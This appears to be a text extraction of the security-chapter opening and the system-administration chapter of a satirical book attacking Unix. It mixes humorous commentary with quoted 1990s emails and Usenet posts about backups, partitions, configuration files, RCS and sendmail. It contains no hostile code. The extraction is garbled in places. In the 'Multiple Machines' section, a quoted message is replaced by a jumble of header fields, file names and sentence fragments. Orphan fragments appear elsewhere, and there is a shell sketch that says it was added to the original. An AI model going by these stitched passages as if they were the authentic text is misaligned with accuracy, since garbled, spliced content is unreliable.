"George, I need a program to output the string 'Hello World!'"
Part 3: Sysadmin’s Nightmare .
11 System Administration
Unix's Hidden Cost

"If the automobile had followed the same development as the computer, a Rolls-Royce would today cost $100, get a million miles per gallon, and explode once a year killing everyone inside."
—Robert Cringely, InfoWorld

All Unix systems require a System Administrator, affectionately known as a Sysadmin. The sysadmin's duties include:

• Bringing the system up.
• Installing new software.
• Administrating user accounts.
• Tuning the system for maximum performance.
• Overseeing system security.
• Performing routine backups.
• Shutting down the system to install new hardware.
• Helping users out of jams.

A Unix sysadmin's job isn't fundamentally different from sysadmins who oversee IBM mainframes or PC-based Novell networks. But unlike these
other operating systems, Unix makes these tasks more difficult and expensive. The thesis of this chapter is that the economics of maintaining a Unix system is very poor and that the overall cost of keeping Unix running is much higher than the cost of maintaining the hardware that hosts it.

According to one estimate, every 10-25 Unix workstations shipped create at least one full-time system administration job, making system administration a career with a future. Of course, a similar network of Macs or PCs also requires the services of a person to perform sysadmin tasks. But this person doesn't spend full time keeping everything running smoothly; this person often has another job or is also a consultant for many applications. Networked Unix workstations require more administration than standalone Unix workstations because Unix occasionally dumps trash on its networked neighbors. Some Unix sysadmins are overwhelmed by their jobs:

Date:    wed, 5 jun 91 14:13:38 edt
From:    bruce howard <bhoward@citi.umich.edu>
To:      unix-haters
Subject: my story

over the last two days i've received hundreds and hundreds of "your mail cannot be delivered as yet" messages from a unix uucp mailer that doesn't know how to bounce mail properly. i've been assaulted, insulted, and emotionally injured by sendmail processes that fail to detect, or worse, were responsible for generating various of the following: mail loops, repeated unknown error number 1 messages, and mysterious and arbitrary revisions of my mail headers, including all the addresses and dates in various fields.

unix keeps me up for days at a time doing installs, reinstalls, reboots, and reformats, and apparently taking particular joy in savaging my file systems at the end of day on friday. my expressions are no longer regular. my girlfriend has left me (muttering "hacking is a dirty habit, unix is hacker crack") and i've forgotten where my shift key lives. despair is my companion. please, i'm begging you, help me.
Paying someone $40,000 a year to maintain 20 machines translates into $2000 per machine-year. Typical low-end Unix workstations cost between $3000 and $5000 and are replaced about every two years. Combine these costs with the cost of the machines and software, and it becomes clear that the allegedly cost-effective "solution" of "open systems" isn't really cost-effective at all.

Keeping Unix Running and Tuned

Sysadmins are highly paid baby sitters. Just as a baby transforms perfectly good input into excrement, which it then drops in its diapers, Unix drops excrement all over its file system and the network in the form of core dumps from crashing programs, temporary files that aren't, cancerous log files, and illegitimate network rebroadcasts. But unlike the baby, who may smear his nuggets around but generally keeps them in his diapers, Unix plays hide and seek with its waste. Without an experienced sysadmin to ferret them out, the system slowly runs out of space, starts to stink, gets uncomfortable, and complains or just dies.

Baby sitters waste time by watching TV when the baby isn't actively upset (some of them do homework); a sysadmin sits in front of a TV reading netnews while watching for warnings, errors, and user complaints (some of them also do homework). Some systems have so much diarrhea that the diapers are changed automatically:

Date:       20 Sep 90 04:22:36 GMT
From:       alan@mq.com (Alan H. Mintz)
Subject:    Re: uucp cores
Newsgroups: comp.unix.xenix.sco

In article <2495@polari.UUCP>, corwin@polari.UUCP (Don Glover) writes:
> For quite some time now I have been getting the message from uucp cores in /usr/spool/uucp, sure enough I go there and there is a core, I rm it and it comes back…

Yup. The release notes for SCO HDB uucp indicate that "uucico will normally dump core." This is normal. In fact, the default SCO installation includes a cron script that removes cores from /usr/spool/uucp.

Large networks of Unix systems don't like to be
far from their maternal sysadmin, who frequently dials up the system from home in the evening to burp it.

Unix Systems Become Senile in Weeks, Not Years

Unix was developed in a research environment where systems rarely stayed up for several days. It was not designed to stay up for weeks at a time, let alone continuously. Compounding the problem is how Unix utilities and applications (especially those from Berkeley) are seemingly developed: a programmer types in some code, compiles it, runs it, and waits for it to crash. Programs that don't crash are presumed to be running correctly. Production-style quality assurance, so vital for third-party application developers, wasn't part of the development culture.

While this approach suffices for a term project in an operating systems course, it simply doesn't catch code-cancers that appear in production code that has to remain running for days, weeks, or months at a time. It's not surprising that most major Unix systems suffer from memory leaks, garbage accumulation, and slow corruption of their address space—problems that typically only show themselves after a program has been running for a few days. The difficulty of attaching a debugger to a running program (and the impossibility of attaching a debugger to a crashed program) prevents interrogating a program that has been running for days and then suddenly fails. As a result, bugs usually don't get fixed (or even tracked down), and periodically rebooting Unix is the most reliable way to keep it from exhibiting Alzheimer's disease.

Date:    Sat, 29 Feb 1992 17:30:41 PST
From:    Richard Mlynarik <mly@lcs.mit.edu>
To:      UNIX-HATERS
Subject: And I thought it was the leap-year

So here I am, losing with Unix on the 29th of February:

    % make -k xds
    sh: Bus error
    make: Fatal error: The command `date "+19%y 13 * %m + 32 * %d + 24 * %H + 60 * %M + p" | dc' returned status `19200'
    Compilation exited abnormally with code 1 at Sat Feb 29 17:01:34

I was started to get really worked-up for a flaming message about Unix choking on leap-year dates, but further examination—and what example of unix lossage does not tempt one into further, pointless, inconclusive, disheartening examination?—shows that the actual bug is that this machine has been up too long.

The way I discovered this was when the ispell program told me:

    swap space exhausted for mmap data of /usr/lib/libc.so.1.6 is not a known word

Now, one hour and ten minutes of core-dumping, debugger-debugging fun later, it became clear, in a blinding flash, that in fact the poor machine has filled its paging space with non-garbage-collected, noncompactible twinkie crumbs in eleven days. It is well past TIME TO BOOT!

What's so surprising about Richard Mlynarik's message, of course, is that the version of Unix he was using had not already decided to reboot itself.

You Can't Tune a Fish

Unix has many parameters to tune its performance for different requirements and operating conditions. Some of these parameters, which set the maximum amount of some system resource, aren't present in more advanced operating systems that dynamically allocate storage for most system resources. Some parameters are important, such as the relative priority of system processes.

A sysadmin's job includes setting default parameters to the correct values (you've got to wonder why most Unix vendors don't bother setting up the defaults in their software to match their hardware configurations). This process is called "system tuning." Entire books have been written on the subject. System tuning sometimes requires recompiling the kernel, or, if you have one of those commercial "open systems" that doesn't give you the sources, hand-patching your operating system with a debugger. Average users and sysadmins often never find out about vital parameters because of the poor documentation.
Fortunately, very experienced sysadmins (those with a healthy disrespect for Unix) can win the battle:

Date:    Tuesday, January 12, 1993 2:17AM
From:    Robert E. Seastrom <rs@ai.mit.edu>
To:      UNIX-HATERS
Subject: what a stupid algorithm

I know I'm kind of walking the thin line by actually offering useful information in this message, but what the heck, you only live once, right?

Anyway, here's the deal. I have this Sparcstation ELC which I bought for my personal use in a moment of stupidity. It has a 760MB hard disk and 16MB of memory. I figured that 16MB ought to be enough, and indeed, pstat reports that on a typical day, running Ecch Windows, a few Emacses, xterms, and the occasional xload or xclock, I run 12 to 13MB of memory usage, tops.

But I didn't come here today to talk about why 2 emacses and a window system should take five times the total memory of the late AI KS-10; no, today I came to talk about the virtual memory system. Why is it that when I walk away from my trusty jerkstation for a while and come back, I touch the mouse and all of a sudden, whirr, rattle, rattle, whirr, all my processes get swapped back into memory? I mean, why did they get paged out in the first place? It's not like the system needed that memory—for chrissake, it still has 3 or 4 MB free!

Well, I hear from the spies out on abUsenet (after looking at the paging code and not being able to find anything) that there's this magic parameter in the swapping part of the kernel called maxslp (that's "max sleep" for the non-vowel-impaired) that tells the system how long a process can sleep before it is considered a "long sleeper" and summarily paged out whether it needs it or not. The default value for this parameter is 20. So if I walk away from my Sparcstation for 20 seconds or take a phone call or something, it very helpfully swaps out all of my processes that are waiting for keyboard input. So it has a lot of free memory to fire up new processes in or use as buffer space (for I/O from processes that have already been
swapped out, no doubt). Spiffy, huh?

What's that, you say? Oh, right, it's not 1983, and there is absolutely nothing to be gained by summarily paging out stuff that you don't have to just so you have a lot of empty memory lying around? Damnit, if the system is not out of memory, then it shouldn't page or swap! Period! Why doesn't someone tell Sun that their workstations aren't Vaxen with 2MB of RAM? I forgot—Sun wants their brand new spiffy fast workstations to feel like a VAX 11/750 with 2MB of RAM and a load factor of 6. Nothing like nostalgia, is there? feh.

So I used that king of high performance featureful debugging tools (adb) to goose maxslp up to something more appropriate (like 2,000,000,000).

Disk Partitions and Backups

Disk space management is a chore on all types of computer systems; on Unix, it's a Herculean task. Before loading Unix onto your disk, you must decide upon a space allocation for each of Unix's partitions. Unix pretends your disk drive is a collection of smaller disks (each containing a complete file system), as opposed to other systems like TOPS-20, which let you create a larger logical disk out of a collection of smaller physical disks.

Every alleged feature of disk partitions is really there to mask some bug or misdesign. Disk partitions are touted as hard disk quotas that limit the amount of space a runaway process or user can use up before his program halts. This "feature" masks a deficient file system that provides no facilities for placing disk quota limits on directories or portions of a file system. These "features" engender further bugs and problems, which, not surprisingly, require a sysadmin (and additional, recurring costs) to fix.

For example, Unix commonly fails when a program or user fills up the /tmp directory, thus causing most other processes that require temporary disk space to fail. Most Unix programs don't check whether writes to disk complete successfully; instead, they just proceed merrily along, writing your email to a full disk. In comes the sysadmin, who "solves" the problem by rebooting the system, because the boot process will clear out all the crud that accumulated in the /tmp directory. So now you know why the boot process cleans out /tmp.

Making a "large" partition containing the /tmp directory just moves the problem around: it doesn't solve anything. No matter how big you make /tmp, a user will want to sort a file that requires a temporary file 36 bytes larger than the /tmp partition size. What can you do? Get your costly sysadmin to dump your whole system to tape (while it is single-user, of course), then repartition your disk to make /tmp bigger (and something else smaller, unless buying an additional disk), and then reload the whole system from tape. More downtime, more cost. It's a relatively expensive solution, but much easier to implement than fixing Unix.

The swap partition is another fixed size chunk of disk that frequently turns out not to be large enough. In the old days, when disks were small, it made sense to put the entire swap partition on a single fast, small drive. But it no longer makes sense to have the swap size be a fixed size. That space so carefully reserved in the partition for the one or two times it's needed can't be used for things such as user files that are in another partition. It sits idle most of the time, reserved for the times when a program may actually need all that space to work properly. It's a shell game.

Does Unix get unhappy when it runs out of swap space? Does a baby cry when it finishes its chocolate milk and wants more? When a Unix system runs out of swap space, it gets cranky. It kills processes without warning. Windows on your workstation vanish without a trace. The system gives up the ghost and panics. Adding a new program (especially an X program!) to your system often throws a system over the swap space limit. (Sound familiar?)

Want to fix the vanishing process trick problem by increasing swap space? Get your costly sysadmin to dump your whole system to tape (while it is single-user, of course), then repartition your disk to make /swap bigger, and then reload the whole system from tape. More downtime, more cost.

So Unix does progress a little. The problem of fixed size disk partitions still hurts less now that gigabyte disks are standard equipment. Hey, disks are cheap these days. The manufacturers ship machines with disk partitions large enough to avoid problems. Some Unix vendors now swap to the file system, though swapping to the file system is much slower. Some Unix vendors do it right, and let the paging system dynamically eat into the file system up to a fixed limit. Others do it wrong and insist on a fixed file for swapping, which is more flexible than reformatting the disk to change swap space but inherits all the other problems.
frequently tripling or quadrupling the tape used for backups. Another additional cost of running a Unix system.

Partitions: Twice the Fun

Because of Unix's tendency to trash its own file system, early Unix gurus developed a workaround to keep some of their files from getting regularly trashed: partition the disk, dividing a single physical disk into several smaller virtual disks, each with its own file system. If the system crashes, and you get lucky, only half your data will be gone.

The rationale behind disk partitions is to keep enough of the operating system intact after a system crash (a routine occurrence) to ensure a reboot (after which the file system is repaired). The file system gets trashed because the free list on disk is usually inconsistent. When Unix crashes, the disks with the most activity get the most corrupted, because those are the most inconsistent disks—that is, they had the greatest amount of information in memory and not on the disk. Since you needed the operating system for recovery, it was better to have a crashing Unix corrupt a user's files than the operating system. (Of course, the fact that the user's files are probably not backed up and that there are copies of the operating system on the distribution tape have nothing to do with this decision.) The gurus decided to partition the disks instead.

The original version of Unix sent outside of Bell Labs didn't come on distribution tapes: Dennis Ritchie hand-built each one with a note that said, "Here's your rk05. Love, Dennis." (The rk05 was an early removable
disk pack.) According to Andy Tannenbaum, "If Unix crapped on your rk05, you'd write to Dennis for another."1

Most Unix systems come equipped with a special partition called the "swap partition" that is used for virtual memory. Early Unix didn't use the file system for swapping because the Unix file system was too slow. The problem with having a swap partition is that the partition is either too small, and your Unix craps out when you try to work on problems that are too large, or the swap partition is too large, and you waste space for the 99% of the time that you aren't running 800-megabyte quantum field dynamics simulations.

There are two simple rules that should be obeyed when partitioning disks:2

1. Partitions must not overlap.
2. Each partition must be allocated for only one purpose.

Otherwise, Unix will act like an S&L and start loaning out the same disk space to several different users at once. When more than one user uses "their" disk space, disaster will result.

In 1985, the MIT Media Lab had a large VAX system with six large disk drives and over 64 megabytes of memory. The system administrators (a group of three undergraduates) noticed that the "c" partition on disk #2 was unused and gave Unix permission to use that partition for swapping. A few weeks later the VAX crashed with a system panic. A day or two after that, somebody who had stored some files on disk #2 reported file corruption. A day later, the VAX crashed again. The system administrators eventually discovered that the "c" partition on disk #2 overlapped with another partition on disk #2 that stored user files.

This error lay dormant because the VAX had so much memory that swapping was rare. Only after a new person started working on a large image-processing project, requiring lots of memory, did the VAX swap to the "c" partition on disk #2. When it did, it corrupted the file system—usually resulting in a panic.

---
1 Andy Tannenbaum, "Politics of UNIX," Washington, DC USENIX Conference, 1984. (Reprinted from a reference in Life With Unix, p. 13)
2 Indeed, there are so many problems with partitioning in Unix that at least one vendor (NeXT, Inc.) recommends that disks be equipped with only a single partition. This is probably because NeXT's Mach kernel can swap to the Unix file system, rather than requiring a special preallocated space on the system's hard disk.
A similar problem happened four years later to Michael Travers at the Media Lab's music and cognition group. Here's a message that he forwarded to UNIX-HATERS from one of his system administrators (a position now filled by three full-time staff members):

Date:    Mon, 13 Nov 89 22:06 EST
From:    saus@media-lab.mit.edu
To:      mt@media-lab.mit.edu
Subject: File Systems

Unfortunately, I made an error when I constructed the file systems /bflat and /valis. The file systems overlapped and each one totally smashed the other. I could find no way to reconstruct the file systems. The stuff that was there is gone for good. If the stuff you had on /bflat was not terribly recent we may be able to get it back from tapes. I'll check to see what the latest tape we have is. I have repaired the problem, but that doesn't help you, I'm afraid. I feel bad about it and I'm sorry but there's nothing I can do about it now.

Down and Backups

Disk-based file systems are backed up regularly to tape to avoid data loss when a disk crashes. Typically, all the files on the disk are copied to tape once a week, or at least once a month. Backups are also normally performed each night for any files that have changed during the day. Unfortunately, there's no guarantee that Unix backups will save your bacon:

Date:         18 Feb 92 20:13:51 GMT
From:         bostic@OKEEFFE.CS.BERKELEY.EDU (Keith Bostic)
Subject:      V1.95 (Lost bug reports)
Newsgroups:   comp.bugs.4bsd.ucb-fixes
Organization: University of California at Berkeley

We recently had problems with the disk used to store 4BSD system bug reports and have lost approximately one year's worth. We would very much appreciate the resubmission of any bug reports sent to us since January of 1991.

—The Computer Systems Research Group
One can almost detect an emergent intelligence, as in "Colossus: The Forbin Project": Unix managed to purge from itself the documents that prove it's buggy.1 The backups, made with the Berkeley tape backup program, were also bad.

Clearly, Unix is not a serious option for applications with continuous uptime requirements. Because Unix lacks facilities to backup a "live" file system, a proper backup requires taking the system down to its stand-alone or single-user mode, where there will not be any processes on the system changing files on disk during the backup. For systems with gigabytes of disk space, this translates into hours of downtime every day. (With a sysadmin getting paid to watch the tapes whirr.) One set of Unix systems that desired continuous uptime requirements was forced to tell their users in /etc/motd to "expect anomalies" during backup periods:

    SunOS Release 4.1.1 (DIKUSUN4CS) #2: Sun Sep 22 20:48:55 MET DST 1991

    --------------------------- BACKUP PLAN ----------------------------
    Skinfaxe:     24. Aug.  9.00-12.00
    Freja & Ask:  31. Aug.  9.00-13.00
    Odin:          7. Sep.  9.00-13.00
    Rimfaxe:      14. Sep.  9.00-12.00
    Sun4c:        21. Sep.  9.00-12.00
    Div.:         …
    Please note that anomalies can be expected when using the Unix
    systems during the backups.
    ---------------------------------------------------------------------

Unix's method for updating the data and pointers that it stores on the disk allows inconsistencies and incorrect pointers on the disk as a file is being created or modified. When the system crashes before updating the disk with all the appropriate changes, the file system image on disk becomes corrupt and inconsistent. The corruption is visible during the reboot after a system crash: the Unix boot script automatically runs fsck to put the file system back together again. Many Unix sysadmins don't realize that inconsistencies occur during a system dump to tape as well.

The backup program takes a snapshot of the current file system. Since the dump isn't instantaneous (and usually takes hours), the snapshot becomes a blurry image if there are any users or processes modifying files during the backup, which is always. It's similar to photographing the Indy 500 using a 1 second shutter speed, with similar results: the most important files—the ones that people were actively modifying—are the ones you can't restore.

---
1 This message is reprinted without Keith Bostic's permission, who said "As far as I can tell, [reprinting the message] is not going to do either the CSRG or me any good." He's right.
Not a chance in the Berkeley version of Unix.

Putting data on backup tapes is only half the job. For getting it back, Berkeley Unix blesses us with its restore program. Restore has a wonderful interactive mode that lets you chdir around a phantom file system and tag the files you want retrieved. But if you want to restore the files from the command line, like a real Unix guru, beware:

Date:    Thu, 30 May 91 18:35:57 PDT
From:    Gumby Vinayak Wallace <gumby@cygnus.com>
To:      UNIX-HATERS
Subject: Unix's Berkeley FFS

Have you ever had the misfortune of trying to retrieve a file from backup? Apart from being slow and painful, someone here discovered to his misfortune that a wildcard, when passed to the restore program, retrieves only the first file it matches, not every matching file! But maybe that's considered featureful "minimalism" for a file system without backup bits.

More Sticky Tape

Suppose that you wanted to copy a 500-page document, making sure each page is perfect. You want a perfect copy, so you buy a ream of paper and copy the document one page at a time. What do you do if you find a page with a smudge? If you have more intelligence than a bowling ball, you recopy the page and continue. If you are Unix, you give up completely, destroy the evil paper, buy a new ream of paper, and start over.

No kidding. Unix uses magnetic tape, not paper, to make copies of its disks, but the analogy is extremely apt. Occasionally, there will be a small imperfection on a tape that can't be written on. Unix happily reports the bad spot, asks you to replace the tape with a new one, and makes you start over. Even if the document is 500 pages long and you've successfully copied the first 499 pages, Unix considers an entire tape unusable if it can't write on one inch of it. Sometimes Unix discovers this after spending a few hours to dump 2 gigabytes. Other, more robust operating systems can use these "bad" tapes: they skip over the bad spot when they reach it and continue. The Unix way translates into lost time and money.

Unix names a tape many ways. You might think that something as simple as /dev/tape would be used. No. Instead of a single name like "tape," Unix uses a different name for each kind of tape drive interface available, yielding names like /dev/mt, /dev/xt, and /dev/st. It encodes specific parameters of tape drives into the name of the device specifier. To those names, Unix appends a unit number, like /dev/st0 or /dev/st1. The recording density is selected by adding a certain offset to the unit number: /dev/st8 is actually /dev/st0, and /dev/st9 is /dev/st1. Same drive, different name. But wait, there's more! Prefix the name with an "n" and it tells the driver not to rewind the tape when it is closed. Prefix the name with an "r" and it tells the driver it is a raw device instead of a block mode device. So the names /dev/st0, /dev/nrst0, /dev/nrst8, and /dev/st16 all refer to the same device. Mind boggling, huh?

Because Unix doesn't provide exclusive access to devices, any other user on the system can use the tape drive. Unix "security" controls are completely bypassed in this manner: a tape online with private files can be read by anybody on the system until taken off the drive. The only way around this is to deny everybody other than the system operator access to the tape drive.

As a simple example, suppose your system has two tape drives, called /dev/rst0 and /dev/rst1. You or your sysadmin may have just spent an hour or two creating a tar or dump tape of some very important files on drive 0. Mr. J. Q. Random down the hall has a tape in drive 1. He mistypes a 0 instead of a 1 and does a short dump onto drive 0, destroying your dump! Why does this happen? Because Unix doesn't allow a user to gain exclusive access to a tape drive. A program opens and closes the tape device many times during a dump; each time the file is closed, programs play "dueling resources," a game where no one ever comes out alive.
Every Unix site uses custom scripts to do their dumps, because vendors frequently use different tape drive names and no one can remember the proper options to make the dump program work. Dump scripts? Yes. So much for portability. Change the interface and your sysadmin earns a few more dollars changing all his dump scripts.

Configuration Files

Sysadmins manage a large assortment of configuration files. Unix boasts dozens of them, each requiring an exact combination of letters and hieroglyphics for proper system configuration and operation. Those allergic to Microsoft Windows with its four system configuration files shouldn't get near Unix, lest they risk anaphylactic shock. Each Unix configuration file controls a different process or resource, and each has its own unique syntax. A different syntax for each file ensures sysadmin job security. Field separators are sometimes colons, sometimes spaces, sometimes (undocumented) tabs. If you choose the wrong separator, havoc results that is hard to track down: if you are very lucky, the program reading the configuration file will silently die, trash its own data files, or ignore the rest of the file. Rarely will it gracefully exit and report the exact problem. A highly paid Unix sysadmin could spend hours searching for the difference between some spaces and a tab in one of the following common configuration files. (Beware of the sysadmin claiming to be improving security when editing these files: he is referring to his job, not your system.)

    /etc/rc            /etc/hosts         /etc/motd
    /etc/rc.boot       /etc/fstab         /etc/passwd
    /etc/rc.local      /etc/exports       /etc/protocols
    /etc/inetd.conf    /etc/services      /etc/resolv.conf
    /etc/sendmail.cf   /etc/printcap      /etc/domainname
    /etc/shells        /etc/networks      /etc/uucp/Systems
    /etc/syslog.conf   /etc/aliases       /etc/uucp/Devices
    /etc/termcap       /etc/bootparams    /etc/uucp/Dialcodes
    /etc/group         /etc/format.dat    /etc/hosts.equiv

Multiple Machines Means Much Madness

Many organizations have networks that are too large to be served by one server; twenty machines are about tops for most servers. System administrators now have the nightmare of keeping all the servers in sync with each other, both with respect to new releases and with respect to configuration files. Shell scripts are written to automate this process, but when they err, no one can keep track of who has what copy of which files, or which they inflict on who when,
as the following sysadmins testify: From: Date: To: Subject: Ian Horswill <ian@ai.equiv /etc/uucp/Devices /etc/motd /etc/passwd /etc/protocols /etc/resolv. not your system: /etc/rc /etc/rc.conf /etc/sendmail. A different syntax for each file ensures sysadmin job security. That meant that Muesli’s line printer daemon.Configuration Files 235 lucky.
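The spaces-versus-tab hunt is less painful with a little-advertised trick (a sketch added here, not in the original; `cat -A` is the GNU spelling, `cat -vet` the traditional one):

```shell
# Make the invisible visible: tabs print as ^I, line ends as $.
# (Demonstrated on a scratch file rather than a live /etc file.)
printf 'lp|demo printer:\\\n\t:sd=/var/spool/lpd:\n' > /tmp/printcap.demo
cat -A /tmp/printcap.demo    # a real tab shows as ^I; spaces stay blank
rm /tmp/printcap.demo
```

A line that indents with spaces and one that indents with a tab look identical in vi, but not through this filter.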
(Unix NetSpeak is very bizarre. The vocabulary of the statement “the daemon, lpd, which is supposed to service Thistle, was told that it should spawn a child to connect to itself” suggests that Unix networking should be called “satanic incestuous whelping.”)

The rdist utility (remote distribution) is meant to help keep configuration files in sync by installing copies of one file across the network. Getting it to work just right, however, often takes lots of patience and lots of time:

From: Mark Lottor <mkl@nw.com>
Subject: rdist config lossage
Date: Thursday, September 24, 1992 2:33PM

Recently, someone edited our rdist Distfile. They accidentally added an extra paren on the end of a line. Running rdist produced:

fs1:> rdist
rdist: line 100: syntax error
rdist: line 102: syntax error

Of course, we couldn’t just diff it with the previous version (since Unix lacks version numbers). And checking those lines showed no error; in fact, those lines are both comment lines! A few hours were spent searching the entire file for possible errors, like spaces instead of tabs and such. Finally, the extra paren was found, on line 110 of the file. Why can’t Unix count properly??? Turns out the file has continuation lines (those ending in \). Rdist counts those long lines as a single line. Unix weenies probably think it does the right thing. I only mention this because I’m certain no one will ever fix it. It’s such typical Unix lossage: you can feel the maintenance entropy exponentially increasing.

It’s hard to even categorize this next letter:

From: Stanley Lanning <lanning@parc.xerox.com>
Date: Friday, January 22, 1993 11:13AM
To: UNIX-HATERS
Subject: RCS

Being enlightened people, we too use RCS. Being hackers, we wrote a number of shell scripts and elisp functions to make RCS easier to deal with.
I use Solaris 2.x. Turns out the version of RCS we use around here is kinda old and doesn’t run under Solaris. It won’t run under the Binary Compatibility package, either. But the latest version of RCS does work in Solaris, so I got the latest sources and built them and got back to work.

All seemed OK for a short time, until somebody using the older RCS tried to check out a file I had checked in. It turns out that one of the changes to RCS was a shift from local time to GMT, so that we are all dealing in GMT instead. The older version of RCS looked at the time stamp and figured that the file didn’t even exist yet, so it wouldn’t let the other person access the file. At this point the only thing to do is to upgrade all copies of RCS to the latest. We also have some HP machines here, so they needed to have the latest version of RCS, too.

Building RCS is a magical experience. There’s this big, slow, ugly script that is used to create an architecture-specific header file. It tests all sorts of interesting things about the system and tries to do the right thing on most every machine. And it appears to work. Almost. But that’s only “appears.” One of the great things about Suns (now that they no longer boot fast) is that they are so compatible. With other Suns, that is. The HP machines don’t really support mmap. It’s there, but it doesn’t work, and they tell you to not use it. But the RCS configuration script doesn’t read the documentation; it just looks to see if it’s there. It’s there, so RCS ends up using it. Thank you.

When somebody running on an HP tries to check out a file, it quietly dumps core in some random directory. Sometimes, instead, it crashes the machine. Why? I don’t ask why. I just go ahead and fix things and try to get back to work. So we look at the results of the configuration script, see that it’s using mmap, hit ourselves in the head, edit the configuration script to not even think about using mmap, and try again. Did I mention that the configuration script takes maybe 15 minutes to run? And that it is rerun every time you change anything, including the Makefile? And that you have to change the Makefile to build a version of RCS that you can test? And that I have real work to do? Compile, install, test, edit, compile, install, test. Panic, flaming death, halt, reboot. Compile, install, test, back to work.

I then discovered that our Emacs RCS package doesn’t work with the latest version of RCS. Why? One of the changes to RCS is an apparently gratuitous and incompatible change to the format of the output from rlog. So I hack the elisp code and get back to work. I then discover that there are multiple copies of the Emacs RCS code floating around here, and of course I had only fixed one of them. Why? Because there are multiple copies of Emacs. Hack, hack, hack, and back to work.

I then discovered that our shell scripts are losing because of this same change. While I’m at it I fix a couple of other problems with them, things like using “echo … \c” instead of “echo -n …” under Solaris. Hack, edit, hack, edit, and back to work.

Remember those shell scripts that try to make RCS more usable? It turns out there are multiple copies of them, too, and of course I only fixed one copy. A couple of days later there is another flurry of RCS problems. Things work for other people, but not him. Why? It turns out that unlike the rest of us, he is attempting to use Sun’s cmdtool. cmdtool has a wonderful-wonderful-oh-so-compatible feature: it doesn’t set $LOGNAME. In fact it seems to go out of its way to unset it. And, of course, the scripts use $LOGNAME. Not $USER (which doesn’t work on the HPs), not “who am i | awk '{print $1}' | sed ‘s/*\\!//’” or some such hideous command. So one person can’t use the scripts at all. So the scripts get hacked again to use the elegant syntax “${LOGNAME:-$USER},” and I get back to work.

Finally, it’s been 24 hours since I heard an RCS bug report. I have my fingers crossed.

Maintaining Mail Services

Sendmail, the most popular Unix mailer, is exceedingly complex, of course (see the mailer chapter). Not only does the complexity of sendmail ensure employment for sysadmins, it ensures employment for trainers of sysadmins and keeps your sysadmin away from the job. Just look at Figure 3, which is a real advertisement from the net. It doesn’t need to be this way. Such courses would be less necessary if there was only one Unix (the course covers four different Unix flavors), or if Unix were properly documented.
Sendmail Made Simple Seminar

This seminar is aimed at the system administrator who would like to understand how sendmail works and how to configure it for their environment. The topics of sendmail operation, how to read the sendmail.cf file, how to modify the sendmail.cf file, and how to debug the sendmail.cf file are covered. A pair of simple sendmail.cf files for a network of clients with a single UUCP mail gateway are presented. The SunOS 4.1, ULTRIX 4.1, HP-UX 8.0, and AIX 3.1 sendmail.cf configuration files are discussed.

After this one day training seminar you will be able to:

• Understand the operation of sendmail.
• Understand how sendmail works with mail and SMTP and UUCP.
• Understand the function and operation of sendmail.cf files.
• Understand the operation of vendor specific sendmail.cf files: SunOS 4.1, DEC Ultrix 4.1/4.2, HP-UX 8.0, IBM AIX 3.1/3.2.
• Create custom sendmail rewriting rules to handle delivery to special addresses and mailers.
• Set up a corporate electronic mail domain with departmental sub-domains.
• Set up gateways to the Internet mail network and other commercial electronic mail networks.
• Debug mail addressing and delivery problems.
• Debug sendmail.cf files.

FIGURE 3. Sendmail Seminar Internet Advertisement

All the tasks listed above should be simple to comprehend and perform. Another hidden cost of Unix. Funny thing: the cost is even larger if your sysadmin can’t hack sendmail, because then your mail doesn’t work! Sounds like blackmail.
Where Did I Go Wrong?

Date: Thu, 20 Dec 90 18:45 CST
From: Chris Garrigues <7thSon@slcs.slb.com>
To: UNIX-HATERS
Subject: Support of Unix machines

I was thinking the other day about how my life has changed since Lisp Machines were declared undesirable around here.

Until two years ago, I was single-handedly supporting about 30 LispMs. I was doing both hardware and software support. I reported bugs to Symbolics and when I wasn’t ignored, the fixes eventually got merged into the system. When I arrived, I thought the environment was a mess, so I put in that single weekend to fix the namespace (which lost things mysteriously) and moved things around. During that year and a half, I worked one (1) weekend. I never stayed after 6pm. I took long lunches and rarely stayed much after 5pm. I always got the daily paper read before I left in the afternoon, and often before lunch. I had time to hack for myself.

Then things changed. Now I’m one of four people supporting about 50 Suns. We get hardware support from Sun, so we’re only doing software. I also take care of our few remaining LispMs and our Cisco gateways, but they don’t require much care. I report bugs to Sun and when I’m not ignored, I’m told that that’s the way it’s supposed to work. I work late all the time. I work lots of weekends. I even sacrificed my entire Thanksgiving weekend. Two years later, we’re still cleaning up the mess in the environment, and it’s full of things that we don’t understand at all.

There are multiple copies of identical data which we’ve been unable to merge (mostly lists of the hosts at our site). Running multiple versions of any software, from the OS down, is awkward at best, impossible at worst. New OS versions cause things to break due to shared libraries. We have an Auspex, but that’s just a Sun which was designed to be a server. Buying the Auspex brought us from multiple single points of failure to one huge single point of failure. It’s better: before, people frequently didn’t know that a server was down until it came back up. Even with this, when the mail server is down, “pwd” still fails and nobody, including root, can log in.

Where did I go wrong?
12 Security

Oh, I’m Sorry, Sir, Go Ahead, I Didn’t Realize You Were Root

Unix is computer-scientology, not computer science.
—Dave Mankins

The Oxymoronic World of Unix Security

The term “Unix security” is, almost by definition, an oxymoron, because the Unix operating system was not designed to be secure. Unix’s birth and evolution precluded security. Its roots as a playpen for hackers and its bag-of-tools philosophy deeply conflict with the requirements for a secure system. Security measures to thwart attack were an afterthought, and making Unix run “securely” means forcing it to do unnatural acts. It’s like the dancing dog at a circus. Unix recognizes no gradations of privilege, except for the vulnerable and ill-designed root/rootless distinction. Thus, when Unix is behaving as expected, it is not secure.
Security Is Not a Line Printer

Unix implements computer security as it implements any other operating system service. A collection of text files (such as .rhosts and /etc/groups), which are edited with the standard Unix editor, control the security configuration. Security is thus enforced by a combination of small programs—each of which allegedly do one function well—and a few tricks in the operating system’s kernel to enforce some sort of overall policy.

Combining configuration files and small utility programs, which works passably well for controlling a line printer, fails when applied to system security. Security is not a line printer: for computer security to work, all aspects of the computer’s operating system must be security aware. Because Unix lacks a uniform policy, every configuration file, every executable program, and every start-up script become a critical point. Every piece of the operating system must be examined by itself and in concert with every other piece to ensure freedom from security violations. A single error, a misplaced comma, or a wrong setting on a file’s permissions enable catastrophic failures of the system’s entire security apparatus. The individual elements can even be booby-trapped: Unix’s “programmer tools” philosophy empowers combinations of relatively benign security flaws to metamorphose into complicated systems for breaking security. A “securely run Unix system” is merely an accident waiting to happen. Put another way, the only secure Unix system is one with the power turned off.

Holes in the Armor

